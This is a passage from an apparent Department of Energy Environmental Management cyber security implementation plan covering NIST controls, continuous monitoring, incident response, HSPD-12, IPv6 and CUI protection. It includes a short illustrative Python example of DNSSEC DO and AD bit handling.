   EM Implementation: The RMAIP serves as the Information Security Program Plan for EM. The RMAIP provides an overview of the requirements for the EM enterprise, addresses the required program management controls and roles and responsibilities that enable the program, and is approved by the EM Senior Advisor for the Office of Environmental Management.

PM-1 / 0 / b / Information Security Program Plan
   Requirement: The organization reviews the organization-wide information security program plan annually.
   EM Implementation: The RMAIP is reviewed annually by the EM HQ staff.

PM-1 / 0 / c / Information Security Program Plan
   Requirement: The organization revises the plan to address organizational changes and problems identified during plan implementation or security control assessments.
   EM Implementation: EM HQ ensures that the RMAIP is updated per any organizational changes.

PM-2 / 0 / - / Senior Information Security Officer
   Requirement: The organization appoints a senior information security officer with the mission and resources to coordinate, develop, implement, and maintain an organization-wide information security program.
   EM Implementation: EM HQ has a Cyber Security Program Manager (CSPM) for the enterprise. Each site has an appointed AODR for local cyber security responsibilities.

PM-3 / 0 / a / Information Security Resources
   Requirement: The organization ensures that all capital planning and investment requests include the resources needed to implement the information security program and documents all exceptions to this requirement.
   EM Implementation: Capital Planning and Investment Control (CPIC) activities are coordinated at EM HQ among the respective groups responsible for resource identification.

PM-3 / 0 / b / Information Security Resources
   Requirement: The organization employs a business case/Exhibit 300/Exhibit 53 to record the resources required.
   EM Implementation: The EM HQ CPIC/EA team has the responsibility of developing and maintaining cyber security Exhibit 53/300s.

PM-3 / 0 / c / Information Security Resources
   Requirement: The organization ensures that information security resources are available for expenditure as planned.
   EM Implementation: The EM HQ MIPP Team is established to provide additional security resources to EM sites. An annual budget is approved and available for expenditure as planned.

PM-4 / 0 / - / Plan of Action and Milestones Process
   Requirement: The organization implements a process for ensuring that plans of action and milestones for the security program and the associated organizational information systems are maintained and document the remedial information security actions to mitigate risk to organizational operations and assets, individuals, other organizations, and the Nation.
   EM Implementation: EM has implemented RPM for enterprise consolidation of POA&Ms.

PM-5 / 0 / - / Information System Inventory
   Requirement: The organization develops and maintains an inventory of its information systems.
   EM Implementation: System inventories are maintained locally at each site. In addition, Tenable Security System contains a central database for this information.

PM-6 / 0 / - / Information Security Measures of Performance
   Requirement: The organization develops, monitors, and reports on the results of information security measures of performance.
   EM Implementation: Cyber security performance metrics are addressed for the enterprise in the RMAIP. An EM cyber dashboard has been developed for tracking security measures of performance. Sites have local performance metrics implemented.

PM-7 / 0 / - / Enterprise Architecture
   Requirement: The organization develops an enterprise architecture with consideration for information security and the resulting risk to organizational operations, organizational assets, individuals, other organizations, and the Nation.
   EM Implementation: The Enterprise Architecture is addressed through the EM HQ CPIC/EA team. Coordination occurs between the EM HQ cyber security team and the CPIC/EA team.

PM-8 / 0 / - / Critical Infrastructure Plan
   Requirement: The organization addresses information security issues in the development, documentation, and updating of a critical infrastructure and key resources protection plan.
   EM Implementation: It has been determined that EM has no critical infrastructure.

PM-9 / 0 / a / Risk Management Strategy
   Requirement: The organization develops a comprehensive strategy to manage risk to organizational operations and assets, individuals, other organizations, and the Nation associated with the operation and use of information systems.
   EM Implementation: The RMAIP serves as the risk management strategy for the EM enterprise.

PM-9 / 0 / b / Risk Management Strategy
   Requirement: The organization implements that strategy consistently across the organization.
   EM Implementation: The RMAIP serves as the risk management strategy for the EM enterprise.

PM-10 / 0 / a / Security Authorization Process
   Requirement: The organization manages (i.e., documents, tracks, and reports) the security state of organizational information systems through security authorization processes.
   EM Implementation: The EM Continuous Monitoring Program serves as the primary component of the security authorization process.

PM-10 / 0 / b / Security Authorization Process
   Requirement: The organization designates individuals to fulfill specific roles and responsibilities within the organizational risk management process.
   EM Implementation: EM HQ and each site have designated cyber security roles and responsibilities to facilitate the security authorization process.

PM-10 / 0 / c / Security Authorization Process
   Requirement: The organization fully integrates the security authorization processes into an organization-wide risk management program.
   EM Implementation: EM HQ has developed the RMAIP to integrate security authorization of systems into an enterprise risk management program.

PM-11 / 0 / a / Mission/Business Process Definition
   Requirement: The organization defines mission/business processes with consideration for information security and the resulting risk to organizational operations, organizational assets, individuals, other organizations, and the Nation.
   EM Implementation: Mission/business process definition is addressed through the RMAIP, and each site considers risk from a mission/business process perspective locally through risk assessments. Each site must conduct a Business Impact Assessment for its IT systems.

PM-11 / 0 / b / Mission/Business Process Definition
   Requirement: The organization determines information protection needs arising from the defined mission/business processes and revises the processes as necessary, until an achievable set of protection needs is obtained.
   EM Implementation: EM HQ has acquired a number of enterprise security solutions that are implemented at EM sites. This program procures solutions based upon threats to the EM mission and data security.
EM Central Repository, eGov Risk Portfolio Manager (eGov RPM)
EM sites are to use the EM central repository and eGov RPM for IT and cyber security documentation. The eGov RPM repository will serve as the "institutional memory" for EM sites and computer operational personnel, and will allow the CM team to assist the sites, make operational recommendations, and gather report data for DOE and OMB. EM sites must evaluate their documentation for needed changes as a result of a major change to the system or guidance and update these changes in eGov RPM at least annually.

The ISSM or ISSO is responsible for ensuring that eGov RPM documents are loaded and updated in a timely manner for each accreditation boundary. eGov RPM training will be provided by CM team personnel at the request of each site or as required.

eGov RPM must be used by the CM team to provide preliminary security status information prior to an on-site assessment. It is important that this documentation be up-to-date to shorten the on-site assessment time, reduce the impact on IT personnel, and support accurate reporting.

All sites must use eGov RPM to create their SSPs and upload the appropriate accreditation boundary certification and Contingency Plan (CP), Incident Response Plan (IRP), Configuration Management Plan (CMP), other audit artifacts, and training documentation into the EM eGov RPM central repository. This must be accomplished at least annually, after review and upon updating or modification of the boundary or system documentation.
EM CM Team Responsibilities for Working with EM Sites
The EM CM effort is viewed as a partnership among the EM CSPM, EM federal sites, and EM contractors. Each of these groups has specific tasks that must be accomplished under an effective CM process.

As part of the CM process, site assessment and assistance visits must be conducted annually by an independent party for each approved boundary. In the past, IT systems/boundaries underwent certification testing, security assessment review and, if approved, accreditation. Under NIST SP 800-37 guidance, C&A is no longer used for existing systems; the current requirement is for an ATO to be issued by the AO as a result of CM requirements. Unless a new system is developed or major changes/modifications occur, as determined by the AO, an ST&E will no longer be performed every three years. Based on this change in philosophy and the emphasis on CM, the EM process will migrate to a dependence on site assessment visits. Based on the assessment outcome, which will consist of several CM activities, the AO may be advised to renew or re-authorize the system/boundary. For these reasons the HQ EM CSPM will have input to fee determination.

The EM CM team will assist with the CM effort from an enterprise perspective. The CM team will support the sites by a constant review and update of documentation throughout the life-cycle of the system and then concentrate efforts on identifying weaknesses and corrective actions. The CM team members will continue to assist in fixing documentation as required and offering solutions that are acceptable for the mitigation of discovered weaknesses. The EM CM team will ensure that one-third of the NIST mission-adjusted minimum security controls are tested for acceptable levels of residual risk each year in such a manner that, at a minimum, all security controls are reviewed/tested every three years. The EM CM team will provide an independent, annual continuous monitoring assessment at each site. These on-site assessments will evaluate the site's NIST mission-adjusted minimum security controls for acceptable levels of residual risk on that same rotation, so that all security controls are reviewed/tested at least every three years. After the CM assessment, the CM team will produce a CM Security Assessment Report for the AO with a recommendation for reauthorization status.

The CM team will lead and facilitate the testing of plans (e.g., contingency, incident response) and assist in the validation of POA&M actions in order to verify and close the POA&M item. Leveraging the vulnerability management tool deployment for risk-based auditing against the sites' functional baseline configurations will allow EM to report near real-time risk management conformance in a timely fashion in response to requests for information from, for example, the DOE Office of the Chief Information Officer or OMB. The CM team has developed policy control statements for all the NIST families (e.g., AC-1, AT-1). The sites may use these policy statements to answer the family policy controls. Based on the cooperation of the contractor during these assessments, the EM CSPM will have the ability to give input to fee determination and negatively (or positively) impact fee, if warranted.
EM Sites Continuous Monitoring Responsibilities
EM sites are responsible for moving from a three-year-based C&A posture to a CM process within 60 days of incorporation within a contract. Sites are to continually update their cyber security programs based on NIST SP 800-37. Moving to a more robust CM process will reduce the cost of ATO, produce better cyber security, increase productivity, and render IT services more effective.

All EM government-owned and government-owned contractor-operated systems experience frequent changes, whether to the hardware, software, organizational environments, operational procedures/requirements, or changes in threat levels/risk assessment levels. Government- and contractor-operated systems must be able to respond to these daily, near real-time emerging threats and continuous changes to their information systems by using CM.

Site infrastructures are susceptible to both accidental and malicious changes that can cause a system to become vulnerable. CM can thwart many attacks, prevent the rapid and deep penetration into a network that sophisticated attacks are capable of, and detect vulnerabilities introduced into the infrastructure via changes or due to technological evolution, prior to their being actively exploited.

In today's near real-time attack environment of sophisticated hackers, not all attacks can be successfully prevented. Emphasis is now being placed on protection through the implementation of more robust security controls and continuous monitoring of the operation of security controls to provide early detection, containment, and successful eradication of any intrusion or successful attack.

All EM sites must use the latest version of NIST Security Controls (see Appendix A – NIST SP 800-53 Rev 4, Security Controls and Guidance for the current version). Appendix B – NSS Security Controls are to be used in performing CM evaluations on NSS. Appendices A and B provide EM supplemental guidance for each control with examples of what controls a site may choose to adopt. eGov RPM contains the new controls and will automatically select the baseline control suite for tailoring based on the categorization process in eGov RPM.
EM sites are responsible for the following tasks included within CM:
1. Instituting a CM plan that permits an annual reauthorization to operate, by the AO, of the site's accreditation boundaries, based on CM of the mission-adjusted minimum baseline security controls and on the controls' effectiveness in addressing evolving threats and attacks.
2. Coordinating with the EM CSPM to determine the appropriate mission-adjusted minimum security controls baseline and the accreditation boundary's acceptable level of risk.
3. Assisting the CM assessment team in its annual assessment of the system's mission-adjusted minimum security controls.
4. Coordinating and fully participating in annual EM CM team site assistance visits and all activities associated with the CM visit.
5. Performing an Organization Impact Analysis/BIA review and updating it annually.
6. Maintaining an up-to-date mission-adjusted minimum security controls baseline configuration for all major components within the accreditation boundary (e.g., personal computers, servers, firewalls, intrusion detection systems). All these baselines must meet the NIST guidelines for such equipment. The EM Vulnerability Management tool must be used to test the equipment for conformance.
7. Performing CM on the remaining mission-adjusted minimum security controls baseline not tested by the EM CM Team or other independent assessors.
8. Proactively adjusting, modifying, or implementing additional security controls to keep the system at the same level of risk as when it was last authorized, and updating the SSP accordingly.
9. Recording CM assessment-discovered weaknesses that require further corrective action, as determined by the AO. These must be recorded as site, system, or program POA&Ms with corrective measures and timelines identified. Corrective actions that can be completed in 90 days or less may be tracked by the site; actions that take more than 90 days to complete must have a POA&M established.
10. Updating all CM assessments, POA&M information, the SSP, CP, IR plan, and other security documents as changes occur in the CM process, with the updates entered into eGov RPM by the ISSO (or designee).
11. Preparing a quarterly report (by the ISSM or ISSO) for the AO or AODR on the status and effectiveness of the security controls. This report must include any newly proposed POA&M items and any major changes or modifications within the accreditation boundary. It should be a high-level report of no more than three pages.
12. Forwarding (by the AODR) a copy of the ATO to the EM CSPM after the authorization decision is reached.
13. Reviewing, analyzing, testing, and approving all configuration changes through a configuration control board; these configuration management activities must be performed by the sites. All changes must be analyzed and tested for security impact. Approved changes must be applied to the mission-adjusted minimum security controls, and the baseline configuration documentation must be updated.
14. Mitigating phishing attacks, which continue to be the most effective means for an intruder to gain a foothold in an IT system. EM sites must take action to mitigate phishing attacks and to strengthen the weak link, the user, through continuous training. Annual training alone is no longer sufficient to combat phishing effectively. The EM Phishing server is available and must be used on a regular basis to conduct phishing exercises against a site's user base. Effectiveness can then be measured from the statistics captured by the server and made available to the site.
15. Providing incident response training and testing annually for both users and system security personnel.
16. Identifying, mitigating, categorizing, and reporting all cyber security incidents involving federal information or federal information systems, including privacy breaches, under DOE or DOE contractor control, to the DOE JC3, in accordance with JC3 procedures and guidance.
17. Reporting cyber security incidents involving national security information systems to JC3, in accordance with the requirements in DOE M 470.4B, Chg. 2, Safeguards and Security Program.
18. Testing the contingency plan for every accreditation boundary annually, at a minimum.
19. Developing the contractual fee determination metrics (by the site's CO) set forth in Appendix D, and ensuring these metrics are used as a guide to develop site-specific metrics that affect fee in all EM site management and operating (M&O), service, and subcontractor contracts.
20. Addressing the program management controls PM-6, PM-8, and PM-11 in the SSP.
21. Ensuring and monitoring contractor implementation of cyber security requirements as directed in the Contractor Requirements Document (CRD) of the DOE Cyber Security Management Order, DOE O 205.1B, Chg. 2. This must be accomplished by the Program/Site Offices in conjunction with the COs.
22. Signing the ATO (by the AO). At the end of the CM year, the accumulated scan results, verified data documents, updated RA, and POA&Ms allow the AO to make a risk-based decision on the system's annual authorization to operate. The CM year begins the day the ATO is signed.
Inherited Control Guidance
EM sites may elect to employ a set of security controls that can be inherited by other systems. Approved and tested inherited controls are documented in the SSP of the system inheriting them. The AO and AODR must approve the selection of inheritable controls. Controls may be inherited from any accreditation boundary within the site. If a common controls implementation strategy is used, the common controls must undergo an independent assessment and be authorized by the AO. Inheritable controls are subject to independent assessment, authorization, and CM as outlined in NIST SP 800-37, and to the "Ongoing Authorization" and "Continuous Monitoring Principles and Procedures" discussed above.
AO’s Annual Reauthorization Responsibilities
Under OMB Circular A-130, Appendix III, federal information systems must (1) obtain an ATO in writing and (2) be reauthorized on a CM basis, based on the effectiveness of the CM of their security controls.
The AO for a system/accreditation boundary reviews the system's CM package to make a risk-based decision on reauthorization. This CM package includes, at a minimum:
- A BIA
- An RA
- An SSP
- The CM team's Security Status Assessment Report
- The site's CM scan results
- Incident response logs, intrusions, successful attacks, or evolving threats, as appropriate
- Quarterly AO security briefings by the ISSM/ISSO
National Security Systems
EM NSS will be guided by these key CNSS documents/instructions:
- CNSS 42
- CNSS 26
- CNSSI-1253
- CNSSI-1199
EM's NSS tend to be either networked or stand-alone configurations. Stand-alone systems are eligible for "type" authorization (type certification). Type authorization is used when systems have the same hardware, software, and application configurations; in that case a few systems may be tested at random to determine the reauthorization of all systems of that type. If sites have networked systems with the same hardware, software, and application configurations, those systems may also use type authorization.
NSS boundaries must use the template in Appendix B, NSS Security Controls, to perform CM. These controls conform to the CNSSI 1253 requirements. Appendix B identifies the baseline security controls for NSS based on categorization. The controls are designated as either stand-alone or networked. This baseline can be tailored based on the site's risk profile, and the values assigned to controls within CNSSI 1253 may also be tailored based on the site's risk profile. Any tailoring must be approved by the AO through signing the security plan and issuing an ATO. Sites should make every attempt to adopt the CNSSI 1253 values, especially if they intend to interconnect with other NSS.
All NSS EM CM team assessments will result in a General Status Assessment Report that is entered into eGov RPM, but without any POA&M results. All POA&M results must be stored on the NSS and be available only to cleared and qualified personnel. All site-level CM scans must also be stored on the NSS and be available only to cleared and qualified personnel.
All NSS must use diskless technology, or lock the central processing unit (CPU) and storage media in a manner that prevents users from having physical access to either and prevents physical access to universal serial bus (USB) ports. The exception may be a stand-alone workstation where these requirements are not cost effective; in that case a waiver must be requested from, and approved by, the EM HQ CSPM. All systems must use port-locking software to restrict USB ports to authorized connections only, and the BIOS must be set to boot only from the C drive; any exceptions must be documented in the SSP.
Federal Information Security Management Act of 2002
FISMA reports must be submitted to the OCIO on a quarterly basis. EM HQ will issue data calls to sites for the quarterly reports, as well as to obtain information for other reports. Sites must ensure that information is provided on a timely basis so that all due dates can be met. EM intends to use enterprise-deployed tools to respond to FISMA reporting requirements. When possible, data contained in the EM central repository will be used to respond to the Department of Homeland Security (DHS); if data is lacking, a data call will be conducted.
Incident Response
The near-real-time CM requirements will provide rapid detection and analysis of unauthorized actions and lead to more effective incident response practices and procedures. Consistent with NIST SP 800-61, Computer Security Incident Handling Guide, EM sites must provide a structured and documented approach to at least the following incident types:
- Denial of service
- Malicious code
- Root compromise
- User compromise
- Unauthorized access
- Inappropriate usage
- Multiple components
- Release of personally identifiable information (PII) into the public domain
- Observed activity that is out of the ordinary, appears to be reconnaissance, and may result in future intrusions
EM HQ Mission Information Protection Program (MIPP) Support and Participation
The EM HQ MIPP team is dedicated to the continuous improvement of information assurance and cyber security throughout the DOE EM organization. The team uses the latest methodologies in analytics and monitoring; deploys state-of-the-art cyber security technology to analyze and defend against attacks; provides oversight and assessments of EM sites' cyber security programs; and further enhances MIPP security through site assistance, education, and training. The EM HQ MIPP team also assists EM sites in maturing their cyber security programs by providing guidance, expertise, enterprise solutions, and leadership in safeguarding MIPP information and assets.
From an EM enterprise perspective, a critical metric to monitor is the time taken to patch a critical vulnerability. Critical vulnerabilities exist in operating systems and in applications, and the latter are often overlooked. Benchmarking this process is useful in determining risk throughout the enterprise. Deploying necessary patches remains one of the most effective means of protecting a system. While patching does not make systems impervious to attack, it raises the bar, making attacks more difficult and, as a result, easier to detect. The MIPP team will monitor the progress each site makes in patching critical vulnerabilities and assist when necessary.
As part of the CM strategy for the EM enterprise, the MIPP team will facilitate the sharing of information among EM sites and provide a means of central analysis for the near-real-time detection of malicious activity, using the enterprise full-packet capture capability to look for both known and undiscovered perpetrators. In addition, using benchmarking and monitoring metrics derived from the Headquarters Security System (HQSS) tool suite, MIPP team members will be able to assist sites in mitigating vulnerabilities that are discovered. The CM team will ensure that a consistent level of security is maintained throughout EM.
EM has deployed a full-packet analysis capability at most of its sites. This capability is an invaluable asset to the CM process and provides the ability to distinguish malicious from merely suspicious activity in near real time. Based on evolving known threats, EM can determine whether those threats are active within the enterprise, and EM sites can identify co-opted systems and complete an accurate damage assessment. This capability will continue to be enhanced as new technology enables EM to detect and identify malicious activity. Daily analysis will be conducted, based on indicators from various sources, to detect and characterize malicious activity. The MIPP team will look for ways to use this capability to enhance the CM process. In addition to known threats, analysis will be performed using heuristic tools to detect malicious activity not yet known to the cyber security community, giving EM a more proactive posture and new intelligence for the enterprise. Site personnel can use this tool in local investigations, whether specific to the site or prompted by malicious outsider activity.
CM requires collaboration among program, Departmental, and outside entities (e.g., SANS, the Carnegie Mellon CERT) concerning security incidents. Sharing incident data is a valuable tool for preventing successful attacks on a system. Only through real-time sharing of attack information can one expect to find an attack in progress or prevent a similar attack from happening. As the threat evolves, having actionable information about it allows the threat to be mitigated and, if it succeeds, contained and eradicated. If defenders do not know how the malware operates, they cannot protect against, contain, or eradicate it. Real-time sharing of information is the early warning of a serious threat. With this information it is possible to plot the propagation of many attacks on a worldwide scale: one can see the rate of propagation and the success rate, and therefore understand the critical window available for mitigation in order to prevent a successful attack. The MIPP team will monitor intrusion sets based on information streams made available through this collaborative effort and will share what it learns within EM.
Sites are responsible for confirming and reporting all intrusions, intrusion attempts, suspicious activity, and incidents to JC3. The MIPP team can assist in detection, but only sites can validate, contain, and eradicate an intrusion. Intrusions will occur; 100% prevention is not possible, so timely reporting of incident information is invaluable.
Contingency Planning
Each EM site is responsible for planning, documenting procedures for, and then conducting an annual IT contingency exercise. These exercises should include realistic scenarios drawn from past or anticipated system malfunctions.
Individual sites must conduct a BIA to determine the maximum tolerable downtime (MTD), recovery time objective (RTO), and recovery point objective (RPO). This exercise must include the site's senior managers (contractor and federal), functional area program managers, business leads, and other stakeholders to ensure that realistic MTD, RTO, RPO, and system restoration priorities meet the mission's MTD requirements. The BIA must be reviewed and updated annually to ensure it meets mission, security, and regulatory requirements. The BIA is an exercise performed by the business line to determine the impact of a network failure on the business and site mission. IT staff cannot make these assessments, although they can play a support role in determining restoration priorities and solutions to meet those priorities.
The RE, AODR, and site program managers must jointly agree on changes and levels in the BIA.
Contractor Requirements, System Acquisition and Services
Site Managers must ensure that Contracting Officers are instructed to incorporate this RMAIP into site/facility management contracts and service contracts, as appropriate.
A site Contracting Officer must implement, verify, and monitor the EM RMAIP cyber security clauses within their contract vehicles/documents (see Appendix D, EM Contractor Requirements).
All hardware and software procured to support the EM cyber security requirements must comply with all federal statutes, policy, presidential directives, and other guidance.
- Application software purchased for significant deployment must be HSPD-12 compliant and must be able to operate in conformance with the NIST SP 800-53 controls (as modified) that govern the secure operation of applications (e.g., the application must time out after a designated period of inactivity).
- All hardware purchased must be IPv6 capable, including diagnostic tools purchased for current and future use.
- ENERGY STAR® equipment must be procured, and green IT solutions must be considered for future deployments (e.g., thin clients, VMware, cloud technology, hot and cold aisle configurations in server rooms).
Supply Chain Risk Management
When purchasing software and hardware for deployment in government-owned systems and in systems that will process government data, the supply chain must be managed based on risk. Sites must consider supply chain risks when purchasing components used in NSS and in any unclassified systems categorized as High Impact in accordance with FIPS 199. Supply chain risk management must be considered whenever IT is procured. When software and hardware are purchased for deployment in NSS, consideration should be given to whether the supplier should be made aware of the intended implementation. Sites should update their awareness training to cover supply chain concerns.
Not all IT parts and components are manufactured within the United States, and their origin is often difficult to determine. For this reason, sites must perform a criticality analysis, used in conjunction with the site's BIA, to prioritize supply chain concerns. A threat and risk assessment must be conducted, and country of origin must be considered when purchases are made. Products should be evaluated for supply chain concerns, and operations security (OPSEC) mitigation methods should be applied based on the evaluation and the determined need.
Large sites can discuss supply chain issues with their site counterintelligence (CI) contact and should check with that contact prior to any major purchase. Smaller sites that do not have a CI contact may use the EM MIPP team for advice on purchases and supply chain concerns. The MIPP team has access to CI information and can supply information for use in the threat and risk assessment.
DOE’s Enhanced Cyber Security Services (DEX)
All EM sites are to participate in the DEX program. The EM CSPM will determine, on a case-by-case basis, whether participation is not justified and not in the best interest of the government.
Mobile Device Guidelines for Foreign Travel
All EM-owned data stored on laptops must be encrypted at rest and in transit with FIPS 140-2 validated encryption modules. Mobile devices and removable media must be protected in accordance with site procedures.
Use of all mobile devices is subject to the Department's Safe Passage Program or a similar program.
All mobile devices must be sanitized of data and restored to the mission-adjusted minimum security baselines upon return from foreign travel. This must be accomplished before the device is connected to, or used to access, DOE networks.
Foreign Nationals
The ISSM must implement site-level procedures to comply with DOE Order 142.3A, Unclassified Foreign Visits and Assignments Program, October 14, 2010.
Foreign nationals must not be assigned or granted system administrator privileges on EM systems. Foreign nationals will be granted access to systems only on a need-to-know or job-function basis. The EM CSPM may be asked to grant an exception to this requirement in situations of operational necessity. DOE Order 142.3A requires a security plan for the visit/assignment, and IT security must be a component addressed in that plan.
HSPD-12 Requirements and Projected Milestones
All EM sites must comply with HSPD-12 requirements and OMB memorandum M-11-11 by instituting the following:
- All new systems under development must be enabled to use personal identity verification (PIV) credentials, in accordance with DOE O 206.2, Identity, Credential, and Access Management, and NIST SP 800-76, Biometric Data Specifications for Personal Identity Verification, prior to their authorization to operate by the AO.
- All existing physical and unclassified logical access control systems must use PIV credentials for authentication. This must be accomplished before sites use development or technology refresh funds to complete other activities.
- All procurement of services and products for facility or system access control must be consistent with HSPD-12 and the Federal Acquisition Regulation.
- OMB memorandum M-06-18, Acquisition of Products or Services for Implementation of HSPD-12, requires that organizations acquire products and services that comply with federal policy and standards and support the technical specifications.
- Organizations must accept electronically verified PIV credentials issued by other agencies or organizations.
- All authentication to EM IT systems must use two factors by May 31, 2014. Authentication by user ID and password alone is no longer allowed after this date.
- EM sites and HQ must develop a plan for PIV that meets the content found in the Federal CIO Council's "Federal Identity, Credential and Access Management Roadmap and Implementation Guidance" (www.idmanagement.gov).
IPv6 Requirements and Projected Milestones
EM sites and HQ were instructed to begin developing a plan to upgrade public- and external-facing servers and services (including web, email, domain name system (DNS), Internet service provider (ISP) services, and other external-facing services) to operationally support IPv6 by the end of fiscal year (FY) 2012. In addition, sites and HQ must upgrade client applications that communicate with public Internet servers and supporting networks to operationally use native IPv6 by the end of FY 2014. All EM sites must ensure that procurement of networked IT equipment meets the requirements set forth in the USGv6 Profile and Test Program for completeness and quality of IPv6 capabilities.
It is also recommended that sites appoint an IPv6 Transition Manager to serve as the person responsible for planning and leading the implementation and testing of IPv6 to meet the stated milestones.
Domain Name System Security Extensions (DNSSEC)
The original design of the DNS did not include security or protection mechanisms; it was designed as a scalable distributed system. DNSSEC adds security features while maintaining backwards compatibility.
It is strongly recommended that sites implement DNSSEC, following NIST SP 800-81, Secure Domain Name System (DNS) Deployment Guide, for securing certain kinds of information provided by the DNS on IP networks. DNSSEC is a set of extensions to DNS that provide DNS clients (resolvers) with origin authentication of DNS data, authenticated denial of existence, and data integrity, but not availability or confidentiality.
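The two signalling bits that make the distinction above visible to a client are the DO ("DNSSEC OK") bit, which a client sets in its EDNS0 OPT record to ask the resolver for signed data, and the AD ("Authenticated Data") bit, which a validating resolver sets in its reply. The following Python is an added example, not code from the RMAIP or any DOE tool: it builds a query with DO set and checks a response header for AD. The response bytes are constructed rather than captured, and example.gov is a placeholder name.

```python
"""DNSSEC signalling at the resolver boundary (added illustration, not from the RMAIP).

Builds a query that asks for DNSSEC data (DO bit in the EDNS0 OPT record) and
checks a response header for the AD bit a validating resolver sets. The
response bytes are constructed, not captured; example.gov is a placeholder.
"""
import struct

# Header flag bits (RFC 1035 / RFC 4035)
FLAG_QR, FLAG_RD, FLAG_RA, FLAG_AD, FLAG_CD = 0x8000, 0x0100, 0x0080, 0x0020, 0x0010
EDNS_DO = 0x8000        # "DNSSEC OK" bit in the OPT record's TTL field (RFC 3225)
TYPE_OPT = 41


def encode_name(name):
    """Owner name to uncompressed wire format."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype, txid, dnssec_ok=True):
    """Header + one question + an OPT RR (4096-byte UDP payload) with DO as requested."""
    header = struct.pack("!HHHHHH", txid, FLAG_RD, 1, 0, 0, 1)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    ttl_field = EDNS_DO if dnssec_ok else 0
    opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, 4096, ttl_field, 0)
    return header + question + opt


def parse_header(msg):
    """Decode the 12-byte header into the fields a client needs to check."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "rcode": flags & 0xF, "qr": bool(flags & FLAG_QR),
            "ad": bool(flags & FLAG_AD), "cd": bool(flags & FLAG_CD),
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def _skip_name(msg, off):
    """Advance past a name, handling the compression-pointer form."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if (length & 0xC0) == 0xC0:
            return off + 2
        off += length + 1


def query_has_do(msg):
    """True if the message carries an OPT RR with the DO bit set."""
    h = parse_header(msg)
    off = 12
    for _ in range(h["qdcount"]):
        off = _skip_name(msg, off) + 4          # name, then QTYPE and QCLASS
    for _ in range(h["ancount"] + h["nscount"]):
        off = _skip_name(msg, off)
        off += 10 + struct.unpack("!H", msg[off + 8:off + 10])[0]
    for _ in range(h["arcount"]):
        off = _skip_name(msg, off)
        rtype, _udp_size, ttl_field, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == TYPE_OPT and ttl_field & EDNS_DO:
            return True
        off += 10 + rdlen
    return False


def make_response(txid, ad):
    """Constructed response header (no RRs) as a validating resolver would set it."""
    flags = FLAG_QR | FLAG_RD | FLAG_RA | (FLAG_AD if ad else 0)
    return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)


def response_is_validated(response, expected_id):
    """Accept only a matching, successful, AD-flagged answer."""
    h = parse_header(response)
    return h["qr"] and h["id"] == expected_id and h["rcode"] == 0 and h["ad"]


if __name__ == "__main__":
    q = build_query("example.gov.", 1, 0x1234)
    print("query requests DNSSEC:", query_has_do(q))
    print("validated:", response_is_validated(make_response(0x1234, True), 0x1234))
```

The AD bit only says that the resolver validated; because DNSSEC gives no confidentiality or channel protection, a stub that relies on AD must reach its resolver over a path it trusts (a local validating resolver or a protected channel) or validate the RRSIGs itself, in which case it sets CD to ask the resolver not to withhold unvalidated data.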
Industrial Control Systems
All EM sites that use Industrial Control Systems (ICS) must use NIST SP 800-37, NIST SP 800-53, and NIST SP 800-82 as guidelines for evaluating ICS. The EM CM team, in accordance with the principles outlined in NIST SP 800-82, must evaluate sites that possess ICS. ICS are considered IT systems, require an ATO, and are held to the same rules as information processing systems. ICS control physical processes and therefore require scheduling around those processes to accomplish many of the procedures required by security controls. As a result, ICS controls must be tailored accordingly; for example, group authenticators, less frequent patch cycles, and the absence of screen timeouts are acceptable implementations.
Wireless Information Systems
Wireless devices, services, and technologies that are integrated with or connected to EM networks are considered part of those networks and must comply with all DOE requirements (e.g., password management, auditing, and cryptography). Wireless devices must use the "safe harbor" principles, U.S. Department of Commerce, July 21, 2000, for protection. Wireless networks and devices must obtain an initial authorization and then undergo CM procedures. A wireless intrusion detection system (WIDS) must be deployed to monitor the wireless environment. The WIDS must monitor the entire bandwidth used by 802.11 technologies; to monitor signals consistently and confidently, the system must cover the complete 2.4 GHz industrial, scientific, and medical (ISM) band and the 5 GHz bands used by Institute of Electrical and Electronics Engineers (IEEE) 802.11. Security firmware updates and patches to wireless hardware and software components must be tested and deployed in accordance with configuration management procedures.
Controlled Unclassified Information (CUI) Protection
CUI consists of information that may be exempt from public release, such as Official Use Only information (including PII) and Unclassified Controlled Nuclear Information (UCNI). CUI must be protected at rest and in transit. FIPS 140-2 validated encryption must be used for the transmission of this type of information; Entrust is available for transmission within the DOE complex. Information at rest must also be protected. Encryption at rest is currently cost prohibitive, and products that make data at rest easy to encrypt and manage are not yet widely available; most systems currently rely on physical protections, network segmentation, and restricted access to protect this type of information. Backups of CUI must be encrypted unless solutions such as mirrored disks are used. As technology advances, encryption at rest will become feasible and affordable and should be adopted. Until then, EM sites are to take special steps to protect CUI and to encrypt it at rest with available solutions wherever possible. EM sites are also required to develop a protection plan for CUI, update that plan annually as technology advances, and move to encryption at rest as soon as feasible. Sites must document a business justification for the collection and use of PII for each application that requires PII to be processed on a system. PII must be collected and processed in accordance with applicable laws, regulations, and DOE policy. Sites should reduce the use of PII as much as practical.
Appendix A – NIST SP 800-53 Rev 4 Security Controls and Guidance
This table is a guide for tailoring and implementing the SP 800-53 security controls. The table gives the values/lists that the EM CSPM recommends EM sites implement where NIST has identified control requirements with organization-defined values/lists. Supplemental guidance is provided only for controls that historically have been difficult to define and for which it is difficult to determine appropriate mitigation action. The table is to be used as a baseline and guide when determining site values/lists in accordance with mission needs where NIST notes {organization-defined}; it is not meant to be implemented in full as written. Contracting Officers are not to require that a contractor implement each and every control listed in this table.
Columns: Control # / Enhancement # / Part - Control Name / NIST Control Requirements / Recommended organization-defined values / EM Supplemental Guidance. Rows with no recommended value or supplemental guidance list only the requirement.

AC-1 (enhancement 0), part a.1 - Access Control Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: an access control policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff

AC-1 (enhancement 0), part a.2 - Access Control Policy and Procedures
